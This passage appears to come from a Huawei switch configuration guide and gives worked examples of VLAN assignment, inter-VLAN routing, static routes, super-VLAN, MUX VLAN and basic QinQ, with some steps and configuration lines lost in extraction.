S w it c h
G E 1 /0 /1
S im p lifie d L a y e r 2
s w itc h
U ser host M u ltim e d ia te r m in a l Phone

1 9 2 .1 6 8 .1 .2 /2 4 1 9 2 .1 6 8 .2 .2 /2 4 1 9 2 .1 6 8 .3 .2 /2 4
1. Create VLANs and add interfaces to VLANs so that the interfaces allow the IP subnet-
based VLANs.
2. Enable IP subnet-based VLAN assignment and associate IP subnets with VLANs so that
the switch determines VLANs based on source IP addresses or network segments of
packets.
Procedure
Step 1 Create VLANs.
[Switch] vlan batch 100 200 300 //Create VLAN100, VLAN 200, and VLAN 300 in a
batch.
Step 2 Configure interfaces.

[Switch-GigabitEthernet1/0/1] port link-type hybrid //IP subnet-based VLAN
assignment can only be enabled on hybrid interfaces. The default link type of an
interface is not hybrid, so you need to manually configure the hybrid interface.
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 100 200 300 //Add the
interface to VLANs 100, 200, and 300 in untagged mode.
[Switch-GigabitEthernet1/0/1] ip-subnet-vlan enable //Enable IP subnet-based
VLAN assignment.
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 200 300
Step 3 Configure IP subnet-based VLAN assignment.

[Switch] vlan 100

[Switch-vlan100] ip-subnet-vlan 1 ip 192.168.1.2 24 priority 2 //Configure the
device to forward packets with the IP address of 192.168.1.2/24 and priority of 2
in VLAN 100.
[Switch] vlan 200
in VLAN 200.
[Switch] vlan 300
in VLAN 300.

# Run the display ip-subnet-vlan vlan all command on the switch. The following
information is displayed:
[Switch] display ip-subnet-vlan vlan all
----------------------------------------------------------------
Vlan Index IpAddress SubnetMask Priority
----------------------------------------------------------------
100 1 192.168.1.2 255.255.255.0 2
200 1 192.168.2.2 255.255.255.0 3
300 1 192.168.3.2 255.255.255.0 4
----------------------------------------------------------------
ip-subnet-vlan count: 3 total count: 3
----End
Configuration Files
#
sysname Switch
#
#
vlan 100
ip-subnet-vlan 1 ip 192.168.1.2 255.255.255.0 priority 2
vlan 200
vlan 300
#
port hybrid untagged vlan 100 200 300
ip-subnet-vlan enable
#
port trunk allow-pass vlan 100 200 300
#
return

6.3.6 Example for Directly Connecting a Terminal to a Layer 3

Gateway to Implement Inter-VLAN Communication
Inter-VLAN Communication Overview
After VLANs are assigned, broadcast packets are only forwarded within the same VLAN.
That is, hosts in different VLANs cannot communicate at Layer 2 because VLAN technology
isolates broadcast domains. In real-world applications, hosts in different VLANs often need to
communicate, so inter-VLAN communication needs to be implemented to resolve this. Layer
3 routing or VLAN technology is required to implement inter-VLAN communication.
Huawei provides a variety of technologies to implement inter-VLAN communication. The
following two technologies are commonly used:
l VLANIF interface
A VLANIF interface is a Layer 3 logical interface. You can configure an IP address for a
VLANIF interface to implement inter-VLAN Layer 3 communication.
l Dot1q termination sub-interface
Similar to a VLANIF interface, a sub-interface is also a Layer 3 logical interface. You
can configure dot1q termination and an IP address for a sub-interface to implement inter-
VLAN Layer 3 communication.
It is simple to configure a VLANIF interface, so VLANIF interfaces are the most commonly
used for inter-VLAN communication. However, a VLANIF interface needs to be configured
for each VLAN and each VLANIF interface requires an IP address, which wastes IP
addresses.
The VLANIF interface and Dot1q termination sub-interface can only allow hosts on different
network segments in different VLANs to communicate, whereas super-VLAN (VLAN
aggregation) and the VLAN Switch function allow hosts on the same network segment in
different VLANs to communicate.
Configuration Notes
l The default gateway address of hosts in a VLAN must be the IP address of the VLANIF
interface that corresponds to the VLAN.
Different user hosts of an enterprise transmit the same service, and are located on different
network segments. User hosts transmitting the same service belong to different VLANs and
need to communicate.
As shown in Figure 6-13, User1 and User2 access the same service but belong to different
VLANs and are located on different network segments. User1 and User2 need to
communicate.

Figure 6-13 Networking for configuring inter-VLAN communication using VLANIF

interfaces
Switch
GE1/0/1 GE1/0/2
VLANIF10 VLANIF20
10.10.10.2/24 10.10.20.2/24
VLAN 10 VLAN 20
User1 User2
10.10.10.3/24 10.10.20.3/24
1. Create VLANs and determine the VLANs to which users belong.
2. Add interfaces to VLANs and configure the interfaces to allow the VLANs.
3. Create VLANIF interfaces and configure IP addresses for the VLANIF interfaces to
implement Layer 3 connectivity.
Procedure
Step 1 Configure the switch.
# Create VLANs, and configure interfaces on the switch connected to user hosts as access
interfaces and add them to VLANs.
[Switch-GigabitEthernet1/0/1] port link-type access //Configure the link type
of the interface as access.
[Switch-GigabitEthernet1/0/1] port default vlan 10 //Add the interface to VLAN
10.
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
# Assign IP addresses to VLANIF interfaces.

[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.10.10.2 24 //Set the IP address of VLANIF 10 to
10.10.10.2/24.
[Switch-Vlanif20] ip address 10.10.20.2 24 //Set the IP address of VLANIF 20 to
10.10.20.2/24.

Configure the IP address of 10.10.10.3/24 and default gateway address as 10.10.10.2/24
(VLANIF 10's IP address) for User1 in VLAN 10.

Configure the IP address of 10.10.20.3/24 and default gateway address as 10.10.20.2/24

(VLANIF 20's IP address) for User2 in VLAN 20.
After the configuration is complete, User1 in VLAN 10 and User2 in VLAN 20 can
communicate.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
interface Vlanif10
ip address 10.10.10.2 255.255.255.0
#
interface Vlanif20
ip address 10.10.20.2 255.255.255.0
#
#
#
return
Related Content
Support Community
l VLAN Communication
Videos
l Deploying a Layer 3 Switch on a LAN
6.3.7 Example for Connecting a Terminal to a Layer 3 Gateway

Through a Layer 2 Switch
Overview
After VLANs are assigned, broadcast packets are only forwarded within the same VLAN.
That is, hosts in different VLANs cannot communicate at Layer 2 because VLAN technology
isolates broadcast domains. In real-world applications, hosts in different VLANs often need to
communicate, so inter-VLAN communication needs to be implemented to resolve this. Layer
3 routing or VLAN technology is required to implement inter-VLAN communication.
Huawei provides a variety of technologies to implement inter-VLAN communication. The
following two technologies are commonly used:
l VLANIF interface
A VLANIF interface is a Layer 3 logical interface. You can configure an IP address for a
VLANIF interface to implement inter-VLAN Layer 3 communication.

l Dot1q termination sub-interface

Similar to a VLANIF interface, a sub-interface is also a Layer 3 logical interface. You
can configure dot1q termination and an IP address for a sub-interface to implement inter-
VLAN Layer 3 communication.
Compared with inter-VLAN communication through a VLANIF interface, inter-VLAN
communication through a dot1q termination sub-interface applies to the scenario where an
Ethernet interface connects to many VLANs. There are communication bottlenecks when the
network is busy. This is because data flows from different VLANs preempt the bandwidth of
the primary Ethernet interface.
The VLANIF interface and Dot1q termination sub-interface can only allow hosts on different
network segments in different VLANs to communicate, whereas super-VLAN (VLAN
aggregation) and the VLAN Switch function allow hosts on the same network segment in
different VLANs to communicate.
Configuration Notes
l On the S12700, only E series cards, X1E series cards, and SC cards among S series
support the termination sub-interface. For details, see the card classification in Hardware
Description.
X1E series cards support the termination sub-interface in V200R007C00 and later
versions.
l For Layer 2 interfaces, only hybrid and trunk interfaces support termination sub-
interfaces.
l The VLAN IDs terminated by a sub-interface cannot be created in the system view or be
displayed.
As shown in Figure 6-14, Host A and Host B belong to the R&D department, and Host C and
Host D belong to the quality department. The two departments are connected through a Layer
2 switch, and require Layer 2 isolation and Layer 3 connectivity.

Figure 6-14 Networking for connecting a terminal to a Layer 3 gateway through a Layer 2
switch
SwitchB
GE1/0/1.1 GE1/0/1.2
1.1.1.1/24 2.2.2.1/24
GE1/0/5
SwitchA
GE1/0/1 GE1/0/4
GE1/0/2 GE1/0/3
Host A Host B Host C Host D

1.1.1.2 1.1.1.3 2.2.2.2 2.2.2.3
R&D department Quality department
VLAN 2 VLAN 3
1. Configure interface-based assignment on the Layer 2 switch to implement Layer 2
isolation.
2. Configure sub-interface termination on the Layer 3 switch to implement Layer 3
connectivity.
Procedure
Step 1 Configure Layer 2 switch SwitchA.
# Create VLANs.
[HUAWEI] sysname SwitchA //Change the device name to SwitchA for easy
identification.
[SwitchA] vlan batch 2 to 3 //Create VLAN 2 and VLAN 3 in a batch.
# Add the interface connected to the host to VLANs.

[SwitchA-GigabitEthernet1/0/1] port link-type access //Configure the interface
[SwitchA-GigabitEthernet1/0/1] port default vlan 2 //Add Host A to VLAN 2.
[SwitchA-GigabitEthernet1/0/2] port default vlan 2 //Add Host B to VLAN 2.


[SwitchA-GigabitEthernet1/0/3] port default vlan 3 //Add Host C to VLAN 3.
[SwitchA-GigabitEthernet1/0/4] port default vlan 3 //Add Host D to VLAN 3.
# Enable the interface connected to the Layer 3 switch to transparently transmit packets from
a specified VLAN.
connected to the switch as the trunk interface.
[SwitchA-GigabitEthernet1/0/5] port trunk allow-pass vlan 2 to 3 //Add the
interface to VLAN 2 and VLAN 3.
Step 2 Configure Layer 3 switch SwitchB.

[HUAWEI] sysname SwitchB //Change the device name to SwitchB.
[SwitchB] interface gigabitethernet1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type hybrid
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet1/0/1.1 //Create a sub-interface and enter
the sub-interface view.
[SwitchB-GigabitEthernet1/0/1.1] dot1q termination vid 2 //Set the VLAN ID for
dot1q termination on GE1/0/1.1 to VLAN 2.
[SwitchB-GigabitEthernet1/0/1.1] ip address 1.1.1.1 24
[SwitchB-GigabitEthernet1/0/1.1] arp broadcast enable //A termination sub-
interface directly dicards broadcast packets, so the sub-interface needs to be
configured to forward ARP broadcast packets.
[SwitchB-GigabitEthernet1/0/1.1] quit
[SwitchB] interface gigabitethernet1/0/1.2 //Create a sub-interface and enter
the sub-interface view.
[SwitchB-GigabitEthernet1/0/1.2] dot1q termination vid 3 //Set the VLAN ID for
dot1q termination on GE1/0/1.2 to VLAN 3.
[SwitchB-GigabitEthernet1/0/1.2] ip address 2.2.2.1 24
[SwitchB-GigabitEthernet1/0/1.2] arp broadcast enable
[SwitchB-GigabitEthernet1/0/1.2] quit

Configure the IP address 1.1.1.2/24 for Host A and the default gateway address as the IP
address 1.1.1.1.1/24 of GE1/0/1.1.
Configure the IP address 1.1.1.3/24 for Host B and the default gateway address as the IP
address 1.1.1.1.1/24 of GE1/0/1.1.
Configure the IP address 2.2.2.2/24 for Host C and the default gateway address as the IP
address 2.2.2.1/24 of GE1/0/1.2.
Configure the IP address 2.2.2.3/24 for Host D and the default gateway address as the IP
address 2.2.2.1/24 of GE1/0/1.2.
After the configuration is complete, Host A, Host B, Host C, and Host D can ping each other
and communicate at Layer 3.
----End
Configuration Files
#
sysname SwitchA

#
vlan batch 2 to 3
#
port default vlan 2
#
port default vlan 2
#
port default vlan 3
#
port default vlan 3
#
#
return

#
sysname SwitchB
#
#
ip address 1.1.1.1 255.255.255.0
#
ip address 2.2.2.1 255.255.255.0
#
return
6.3.8 Example for Configuring Communication Between Different

Network Segments Through Static Routes
Overview
In addition to configuring an IP address for a VLANIF interface, you need to configure a
static route or a dynamic routing protocol when PCs on different network segments across
several switches need to communicate. This is because only a direct route is generated for the
VLANIF interface's IP address on the switch and a VLANIF interface can only impalement
interworking between PCs on different network segments through one switch.
Static routes can be easily configured and have low requirements on the system. They are
applicable to simple, stable, and small-scale networks. However, static routes cannot
automatically adapt to changes in the network topology, and manual intervention is required.
With routing algorithms, dynamic routing protocols can automatically adapt to changes in the
network topology. They are applicable to the network where some Layer 3 devices are
deployed. The configurations of dynamic routes are complex. Dynamic routes have higher
requirements on the system than static ones and consume more network and system resources.

Configuration Notes
As shown in Figure 6-15, to ensure security and facilitate management, an enterprise assigns
a VLAN for a server. The user device belongs to VLAN 10, and the server belongs to VLAN
20. Access, aggregation, and core switches are deployed between the user and server. Access
switches are layer 2 switches, and aggregation and core switches are Layer 3 switches. The
user and server need to communicate with each other due to service requirements.
Figure 6-15 Networking for configuring communication between different network segments
through static routes
CORE core switch

VLANIF20：
192.168.1.1/24
GE1/0/3 GE1/0/2
AGG
GE1/0/3
aggregation switch
VLANIF10：
10.1.1.1/24
GE1/0/2
GE1/0/2 GE1/0/2
ACC1 ACC2
GE1/0/1 Access switches GE1/0/1
User: VLAN 10 Server: VLAN 20

IP address: 10.1.1.2/24 IP address: 192.168.1.2/24
Gateway address: Gateway address:
10.1.1.1 192.168.1.1
1. Configure interface-based VLAN assignment to implement Layer 2 communication.

2. Configure VLANIF 10 on the aggregation switch AGG and configure an IP address for
VLANIF 10 as the gateway address of the user; configure VLANIF 20 on the core
switch CORE and configure an IP address for VLANIF 20 as the gateway address of the
server.
3. On the aggregation switch AGG, configure a static route from AGG to the network
segment of VLANIF 20; on the core switch CORE, configure a static route from CORE
to the network segment of VLANIF 10. The communication across network segments is
therefore implemented.

Procedure
Step 1 Configure the access switch ACC1.
# Create VLANs.
[HUAWEI] sysname ACC1 //Change the device name to ACC1 for easy identification.
[ACC1] vlan batch 10 //Create VLAN 10 in a batch.

[ACC1] interface gigabitethernet 1/0/1
[ACC1-GigabitEthernet1/0/1] port link-type access //Configure the interface
connected to a user host as the access interface.
[ACC1-GigabitEthernet1/0/1] port default vlan 10 //Add the user device to VLAN
10.
[ACC1-GigabitEthernet1/0/1] quit
[ACC1-GigabitEthernet1/0/2] port link-type trunk //Configure the interface
connected to the aggregation switch as the trunk interface.
[ACC1-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 //Add the interface
connected to the aggregation switch to VLAN 10.
Step 2 Configure the access switch ACC2.
# Create VLANs.
[HUAWEI] sysname ACC2 //Change the device name to ACC2.
[ACC2] vlan batch 20 //Create VLAN 20 in a batch.

[ACC2-GigabitEthernet1/0/1] port link-type access //Configure the interface
connected to the server as the access interface.
[ACC2-GigabitEthernet1/0/1] port default vlan 20 //Add the user device to VLAN
20.
[ACC2-GigabitEthernet1/0/2] port link-type trunk //Configure the interface
connected to the core switch as the trunk interface.
[ACC2-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 //Add the interface
connected to the core switch to VLAN 20.
Step 3 Configure the aggregation switch AGG.
# Create VLANs.
[HUAWEI] sysname AGG //Change the device name to AGG.
[AGG] vlan batch 10 30 //Creaet VLAN 10 and VLAN 30 in a batch.

[AGG] interface gigabitethernet 1/0/2
[AGG-GigabitEthernet1/0/2] port link-type trunk //Configure the interface as the
trunk interface.
[AGG-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 //Add the interface to
VLAN 10.
[AGG-GigabitEthernet1/0/2] quit
[AGG] interface gigabitethernet 1/0/3
[AGG-GigabitEthernet1/0/3] port link-type trunk //Configure the interface as the
trunk interface.
[AGG-GigabitEthernet1/0/3] port trunk allow-pass vlan 30 //Add the interface

connected to the core switch to VLAN 30.

[AGG-GigabitEthernet1/0/3] quit
# Create VLANIF 10 and configure an IP address for VLANIF 10 as the gateway address.
[AGG] interface vlanif 10 //Create VLANIF 10.
[AGG-Vlanif10] ip address 10.1.1.1 24 //Configure an IP address for VLANIF 10.
The IP address is the gateway address.
[AGG-Vlanif10] quit
# Create VLANIF 30 and configure an IP address for VLANIF 30.

[AGG] interface vlanif 30 //Create VLANIF 30.
[AGG-Vlanif30] ip address 10.10.30.1 24 //Configure an IP address for VLANIF 30.
The IP address cannot conflict with IP addresses of the user and server.
[AGG-Vlanif30] quit
# Configure a static route so that the PC can access the server.

[AGG] ip route-static 192.168.1.0 255.255.255.0 10.10.30.2 //Configure a static
route. The packets with the destination IP address of 192.168.1.0/24 are
forwarded to the IP address 10.10.30.2 of VLANIF 30 on the core switch.
Step 4 Configure the core switch CORE.

# Create VLANs.
[HUAWEI] sysname CORE //Change the device name to CORE.
[CORE] vlan batch 20 30 //Creaet VLAN 20 and VLAN 30 in a batch.

[CORE-GigabitEthernet1/0/2] port link-type trunk //Configure the interface as
the trunk interface.
[CORE-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 //Add the interface to
VLAN 20.
[CORE-GigabitEthernet1/0/3] port link-type trunk //Configure the interface as
the trunk interface.
[CORE-GigabitEthernet1/0/3] port trunk allow-pass vlan 30 //Add the interface to
VLAN 30.
# Create VLANIF 20 and configure an IP address for VLANIF 20 as the gateway address of
the server.
[CORE] interface vlanif 20 //Create VLANIF 20.
[CORE-Vlanif20] ip address 192.168.1.1 24 //Configure an IP address for VLANIF
20. The IP adress is the gateway address of the server.
# Create VLANIF 30 and configure an IP address for VLANIF 30.

[CORE] interface vlanif 30 //Create VLANIF 30.
[CORE-Vlanif30] ip address 10.10.30.2 24 //Configure an IP address for VLANIF 30.
# Configure a static route so that the server and PC can access each other.
[CORE] ip route-static 10.1.1.0 255.255.255.0 10.10.30.1 //Configure a static
route. The packets with the destination IP address of 10.1.1.0/24 are forwarded
to the IP address 10.10.30.1 of VLANIF 30 on the aggregation switch.

Configure the IP address of 10.1.1.2/24 for the PC in VLAN 10 and the default gateway
address as 10.1.1.1 (VLANIF 10's IP address).

Configure the IP address of 192.168.1.2/24 for the server in VLAN 20 and the default
gateway address as 192.168.1.1 (VLANIF 20's IP address).
After the configuration is complete, the PC in VLAN 10 and the server in VLAN 20 can
access each other.
----End
Configuration Files
Configuration file of ACC1
#
sysname ACC1
#
vlan batch 10
#
#
#
return
Configuration file of ACC2

#
sysname ACC2
#
vlan batch 20
#
#
#
return
Configuration file of the aggregation switch AGG

#
sysname AGG
#
vlan batch 10 30
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif30
ip address 10.10.30.1 255.255.255.0
#
#
#
ip route-static 192.168.1.0 255.255.255.0 10.10.30.2
#
return

Configuration file of the core switch CORE

#
sysname CORE
#
vlan batch 20 30
#
interface Vlanif20
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif30
ip address 10.10.30.2 255.255.255.0
#
#
#
ip route-static 10.1.1.0 255.255.255.0 10.10.30.1
#
return
6.3.9 Example for Configuring the Super-VLAN
Super-VLAN Overview
Super-VLAN, also called VLAN aggregation, reduces the number of IP addresses required,
isolates broadcast storms, and controls Layer 2 access on interfaces. A super-VLAN can be
associated with multiple sub-VLANs, which are isolated at Layer 2. All sub-VLANs use the
IP address of the corresponding VLANIF interface for the super-VLAN to implement Layer 3
connectivity with an external network, thereby reducing the number of IP addresses required.
The super-VLAN applies to scenarios where there are many users and VLANs, IP addresses
of devices in many VLANs are on the same network segment, and inter-VLAN Layer 2
isolation needs to be implemented. Inter-VLAN proxy ARP can be enabled to implement
inter-VLAN communication. The scenarios include hotels and residential buildings requiring
broadband access. A room or household is assigned a VLAN and isolated. An IP network
segment cannot be allocated to each VLAN because IP addresses are finite and there are many
VLANs. The VLANs can only share an IP network segment. Assume that the IP network
segment of VLAN 10 is 10.10.10.0/24. A household may use one or two IP addresses,
consuming over 200 IP addresses. Super-VLAN technology allows users in VLANs 11 to 100
to share the IP network segment of 10.10.10.0/24, thus reducing the number of IP addresses
required.
Super-VLAN is Layer 3 technology configured on a Layer 3 switch, whereas MUX VLAN is

configured on a Layer 2 switch. The super-VLAN is easy to configure. The MUX VLAN
configuration is complex, but its access control is more flexible than super-VLAN. When the
switch queries temporarily offline users in the super-VLAN, the gateway needs to broadcast
packets in each sub-VLAN, consuming many CPU resources.
Configuration Notes
l VLAN 1 cannot be configured as a super-VLAN.
l No physical interface can be added to a VLAN configured as a super-VLAN.

As shown in Figure 6-16, a company has many departments on the same network segment.
To improve service security, the company assigns different departments to different VLANs.
VLAN 2 and VLAN 3 belong to different departments. Each department wants to access the
Internet, and PCs in different departments need to communicate to meet service requirements.
Figure 6-16 Networking of the super-VLAN
In te rn e t
R o u te r
G E 1 /0 /1
VLAN 10
S w itc h B S u p e r-V L A N 4
G E 1 /0 /5
G E 1 /0 /5
S w itc h A
G E 1 /0 /1 G E 1 /0 /4
G E 1 /0 /2 G E 1 /0 /3
VLAN 2 VLAN 3
Configure VLAN aggregation on SwitchB to add VLANs of different departments to a super-
VLAN so that PCs in different departments can access the Internet using the super-VLAN.
Deploy proxy ARP in the super-VLAN so that PCs in different departments can
communicate. The configuration roadmap is as follows:
1. Configure VLANs and interfaces on SwitchA and SwitchB, add PCs of different
departments to different VLANs, and configure interfaces on SwitchA and SwitchB to
transparently transmit packets from VLANs.
2. Configure a super-VLAN, a VLANIF interface, and a static route on SwitchB so that
PCs in different departments can access the Internet.
3. Configure proxy ARP in the super-VLAN on SwitchB so that PCs in different
departments can communicate at Layer 3.
Procedure
Step 1 Configure SwitchA.
# Add GE1/0/1, GE1/0/2, GE1/0/3, and GE1/0/4 to VLANs.
[SwitchA] vlan batch 2 to 3
[SwitchA-GigabitEthernet1/0/1] port link-type access //Configure the link type
[SwitchA-GigabitEthernet1/0/1] port default vlan 2 //Add the interface to VLAN

2.
[SwitchA-GigabitEthernet1/0/2] port default vlan 2
3.
# Configure GE1/0/5 to transparently transmit packets from VLAN 2 and VLAN 3.

Step 2 Configure SwitchB.

# Create VLAN 2, VLAN 3, VLAN 4, and VLAN 10 and configure the interface of SwitchB
connected to SwitchA to transparently transmit packets from VLAN 2 and VLAN 3 to
SwitchB.
[SwitchB] vlan batch 2 3 4 10
[SwitchB] interface gigabitethernet 1/0/5
[SwitchB-GigabitEthernet1/0/5] port link-type trunk
[SwitchB-GigabitEthernet1/0/5] port trunk allow-pass vlan 2 3
# Configure super-VLAN 4 on SwitchB and add VLAN 2 and VLAN 3 to super-VLAN 4 as

sub-VLANs.
[SwitchB] vlan 4
[SwitchB-vlan4] aggregate-vlan
[SwitchB-vlan4] access-vlan 2 to 3
[SwitchB-vlan4] quit
# Create and configure VLANIF 4 so that PCs in different departments can access the Internet
using super-VLAN 4.
[SwitchB-Vlanif4] ip address 10.1.1.1 24
# Configure the uplink interface GE1/0/1 to transparently transmit packets from the VLAN
that SwitchB and router belong to.
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
# Create and configure VLANIF 10 and specify the IP address of VLANIF 10 as the IP
address for connecting SwitchB and the router.
# Configure a static route to the router on SwitchB so that users can access the Internet.

[SwitchB] ip route-static 0.0.0.0 0.0.0.0 10.10.1.2
NOTE
Configure the router interface connected to SwitchB and assign the IP address of 10.10.1.2 to the router
interface. See the router configuration manual.
Step 3 Assign IP addresses to PCs.

Configure IP addresses for PCs and ensure that their IP addresses are on the same network
segment as 10.1.1.1/24 (IP address of VLANIF 4).
After the configuration is complete, PCs in each department can access the Internet, but PCs
in VLAN 2 and VLAN 3 cannot ping each other.
Step 4 Configure proxy ARP.
# Configure proxy ARP in super-VLAN 4 on SwitchB so that users in different departments
can communicate at Layer 3.
[SwitchB-Vlanif4] arp-proxy inter-sub-vlan-proxy enable

After the configuration is complete, users in VLAN 2 and VLAN 3 can ping each other and
access the Internet.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 2 to 3
#
port default vlan 2
#
port default vlan 2
#
port default vlan 3
#
port default vlan 3
#
#
return

#
sysname SwitchB
#

vlan batch 2 to 4 10
#
vlan 4
aggregate-vlan
access-vlan 2 to 3
#
interface Vlanif4
ip address 10.1.1.1 255.255.255.0
arp-proxy inter-sub-vlan-proxy enable
#
interface Vlanif10
ip address 10.10.1.1 255.255.255.0
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.10.1.2
#
return
6.3.10 Example for Configuring MUX VLAN to Isolate Users in

the Same VLAN
MUX VLAN Overview

Multiplex VLAN (MUX VLAN) provides a mechanism to control network resources using
VLANs. It can implement inter-VLAN communication and intra-VLAN isolation. The MUX
VLAN often applies to hotels and residential buildings requiring broadband access, and
enterprises. A hotel, residential building, or enterprise shares the same VLAN, but each room,
household, or department is isolated.
MUX VLAN is configured on a Layer 2 switch, whereas super-VLAN technology is

configured on a Layer 3 switch. MUX VLAN is more flexible in access control, but its
configuration is complex.
Configuration Notes
l The VLAN ID assigned to a principal VLAN cannot be used to configure VLAN
mapping, VLAN stacking, super-VLAN, or sub-VLAN.
l The VLAN ID assigned to a group or separate VLAN cannot be used to configure any
VLANIF interface, VLAN mapping, VLAN stacking, super-VLAN, or sub-VLAN.
l Disabling MAC address learning or limiting the number of learned MAC addresses on
an interface affects the MUX VLAN function on the interface.
l MUX VLAN and port security cannot be configured on the same interface
simultaneously.
l MUX VLAN and MAC address authentication cannot be configured on the same
interface simultaneously.
l MUX VLAN and 802.1x authentication cannot be configured on the same interface
simultaneously.
l If the MUX VLAN function is enabled on an interface, VLAN mapping and VLAN
stacking cannot be configured on the interface.

All employees of an enterprise can access servers on the enterprise network. The enterprise
allows some employees to communicate but expects to isolate some employees.
As shown in Figure 6-17, Switch1 is deployed at the aggregation layer and used as the
gateway for downstream hosts. Switch2, Switch3, Switch4, Switch5, and Switch6 are access
switches. Their GE1/0/1 interfaces connect to downstream hosts, and their GE1/0/2 interfaces
connect to Switch1. You can configure MUX VLAN on Switch1. This reduces the number of
VLAN IDs on the enterprise network and facilitates network management.
Figure 6-17 Networking of MUX VLAN
In te rn e t
S w itc h 2
S w itc h 1 G E 1 /0 /2
S e rve r
G E 1 /0 /3 G E 1 /0 /6 VLAN 2
GE
(P rin cip a l V L A N )
/4
1/0
1/0
GE
/5
S w itc h 3 S w itc h 4 S w itc h 5 S w itc h 6
H o stB H o stC H o stD H o stE

V L A N 3 (G ro u p V L A N ) V L A N 4 (S e p a ra te V L A N )
1. Configure the principal VLAN and a VLANIF interface. The IP address of the VLANIF
interface is used as the gateway IP address for downstream hosts and servers.
2. Configure the group VLAN.
3. Configure the separate VLAN.
4. Add interfaces to VLANs and enable the MUX VLAN function on the interfaces.
5. Add interfaces of access switches to VLANs.
Procedure
Step 1 Enable the MUX VLAN function on Switch1.

# On Switch1, create VLAN 2, VLAN 3, and VLAN 4, and a VLANIF interface for VLAN 2.
The IP address of the VLANIF interface is used as the gateway IP address for downstream
hosts and servers.
[Switch1] vlan batch 2 3 4
[Switch1] interface vlanif 2
[Switch1-Vlanif2] ip address 192.168.100.100 24
[Switch1-Vlanif2] quit
# Configure the group VLAN and separate VLAN of the MUX VLAN on Switch1.
[Switch1] vlan 2
[Switch1-vlan2] mux-vlan
[Switch1-vlan2] subordinate group 3 //Configure VLAN 3 as the group VLAN.
[Switch1-vlan2] subordinate separate 4 //Configure VLAN 4 as the separate VLAN.
# Add interfaces to the VLANs on Switch1 and enable the MUX VLAN function on
interfaces.
[Switch1-GigabitEthernet1/0/2] port mux-vlan enable vlan 2
Step 2 Configure interfaces of access switches and add them to VLANs. The configurations of
Switch3, Switch4, Switch5, and Switch6 are similar to the configuration of Switch2, and are
not mentioned here.
[Switch2] vlan batch 2
[Switch2-GigabitEthernet1/0/1] port link-type access //Configure the link type
[Switch2-GigabitEthernet1/0/1] port default vlan 2
[Switch2-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 //Configure the
link type of the interface as trunk.

The server can communicate with HostB, HostC, HostD, and HostE.

HostB can communicate with HostC.

HostD cannot communicate with HostE.
HostB and HostC cannot communicate with either HostD or HostE.
----End
Configuration Files
Configuration file of Switch1
#
sysname Switch1
#
vlan batch 2 to 4
#
vlan 2
mux-vlan
subordinate separate 4
subordinate group 3
#
interface Vlanif2
ip address 192.168.100.100 255.255.255.0
#
port mux-vlan enable vlan 2
#
#
#
#
#
return
#
sysname Switch2
#
vlan batch 2
#
port default vlan 2
#

#
return
#
sysname Switch3
#
vlan batch 3
#
port default vlan 3
#
#
return
#
sysname Switch4
#
vlan batch 3
#
port default vlan 3
#
#
return
#
sysname Switch5
#
vlan batch 4
#
port default vlan 4
#
#
return
#
sysname Switch6
#
vlan batch 4
#
port default vlan 4
#


#
return
6.4 Typical QinQ Configuration

6.4.1 Example for Configuring Basic QinQ
QinQ Overview
802.1Q-in-802.1Q (QinQ) expands VLAN space by adding an additional 802.1Q tag to
802.1Q tagged packets. It allows services in a private VLAN to be transparently transmitted
over a public network.
Basic QinQ, also called QinQ tunneling, is performed on interfaces. When an interface
enabled with basic QinQ receives a packet, the device adds the default VLAN tag of its
interface to the packet. If the received packet is tagged, it has double VLAN tags. If the
received packet is untagged, it has the default VLAN tag of the interface.
When too many VLANs are required, you can configure basic QinQ. Basic QinQ, by adding
an outer tag, expands VLAN space and solves the VLAN shortage problem.
Configuration Notes
As shown in Figure 6-18, a network has two enterprises: enterprise 1 and enterprise 2. Both
enterprises have two branches. Enterprise 1 and enterprise 2 networks connect to SwitchA and
SwitchB, respectively, of the ISP network. In addition, there are non-Huawei devices on the
public network and the TPID in the outer VLAN tag is 0x9100.
The requirements are as follows:
l VLANs need to be independently assigned to enterprise 1 and enterprise 2.
l Traffic between the two branches of each enterprise is transparently transmitted through
the public network. Users accessing the same service in different branches of each
enterprise are allowed to communicate, and users accessing different services must be
isolated.
QinQ can be used to meet the preceding requirements. Configure VLAN 100 and VLAN 200
to implement connectivity of enterprise 1 and enterprise 2 respectively and to isolate
enterprise 1 and enterprise 2; configure the TPID in the outer VLAN tag on switch interfaces
connected to non-Huawei devices so that Huawei switches can communicate with the non-
Huawei devices.

Figure 6-18 Networking of basic QinQ
ISP
VLAN 100,200
TPID=0x9100
GE1/0/3 GE1/0/3
Switch A Switch B
GE1/0/1 GE1/0/2 GE1/0/1 GE1/0/2
Enterprise 1 Enterprise 2 Enterprise 1 Enterprise 2

VLAN 10 to 50 VLAN 20 to 60 VLAN 10 to 50 VLAN 20 to 60
1. Create VLAN 100 and VLAN 200 on SwitchA and SwitchB, configure connected
interfaces as QinQ interfaces, and add the interfaces to VLANs so that different VLAN
tags are added to packets of different services.
2. Add interfaces of SwitchA and SwitchB that are connected to the public network to
VLANs so that packets from VLAN 100 and VLAN 200 are allowed to pass through.
3. Configure the TPID in the outer VLAN tag on interfaces of SwitchA and SwitchB that
are connected to the public network so that SwitchA and SwitchB can communicate with
non-Huawei devices.
Procedure
# Create VLAN 100 and VLAN 200 on SwitchA.

# Create VLAN 100 and VLAN 200 on SwitchB.

[SwitchB] vlan batch 100 200
Step 2 Set the link type of interfaces to QinQ.
# Configure GE1/0/1 and GE1/0/2 of SwitchA as QinQ interfaces, and set the default VLAN
